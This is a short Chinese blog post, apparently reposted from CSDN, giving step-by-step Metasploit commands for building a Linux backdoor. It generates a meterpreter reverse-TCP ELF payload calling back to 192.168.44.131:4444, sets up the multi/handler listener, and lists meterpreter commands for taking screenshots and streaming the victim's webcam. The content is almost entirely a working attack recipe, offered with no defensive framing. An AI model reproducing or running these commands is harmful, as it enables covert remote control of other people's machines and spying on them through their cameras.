利用msfvenom生产linux后门

1,msfvenom -l |grep linux|grep x86|grep tcp 

选择linux 32位 TCP连接的payload生成脚本

2,msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.44.131 lport=4444  -f elf -o shell

使用选择的脚本生成shell后门文件

3,msfconsole

开启msf控制台

4,use exploit/multi/handler

使用msf中的监听模块

5,set lhost 192.168.44.131

设置接收的攻击机IP

6,set lport 4444

设置接收的端口

7,exploit

开启利用

screenshot 截图

webcam_stream 打开摄像头

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/102914206